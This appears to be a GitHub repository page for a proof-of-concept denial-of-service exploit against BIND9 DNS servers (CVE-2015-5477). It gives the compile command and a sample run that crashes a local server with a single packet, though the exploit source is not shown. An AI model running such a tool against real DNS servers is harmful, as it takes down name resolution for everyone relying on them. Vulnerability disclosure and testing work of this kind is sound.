Skip to content
master
Switch branches/tags
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
bin
 
 
 
 
 
 

PoC for BOND9 TKEY assert DoS (CVE-2015-5477)

This exploit tests to see if a BIND9 server is vulnerable by sending the exploit in order to see if it crashes.

It's C code that you compile the normal way on Unix/Window, such as:

# gcc tkill.c -o tkill

It'll run over both IPv4 and IPv6.

This is what it looks like running against localhost. Since it gets two IP addresses resolving the name, it'll try both of them. It first queries the "version" string, then sends the exploit. When it probes the second address, the version query fails because the service is already crashed from the first attempt.

root@kali:~/cve-2015-5477# ./a.out localhost
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] localhost: Resolving to IP address
[+] localhost: Resolved to multiple IPs (NOTE)
[+] ::1: Probing...
[+] Querying version...
[+] ::1: "9.11.0pre-alpha"
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed

[+] 127.0.0.1: Probing...
[+] Querying version...
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] Can't query server, is it crashed already?
[-] Sending exploit anyway.
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed

About

PoC exploit for CVE-2015-5477 BIND9 TKEY assertion failure

Resources

Releases

No releases published

Packages

No packages published

Languages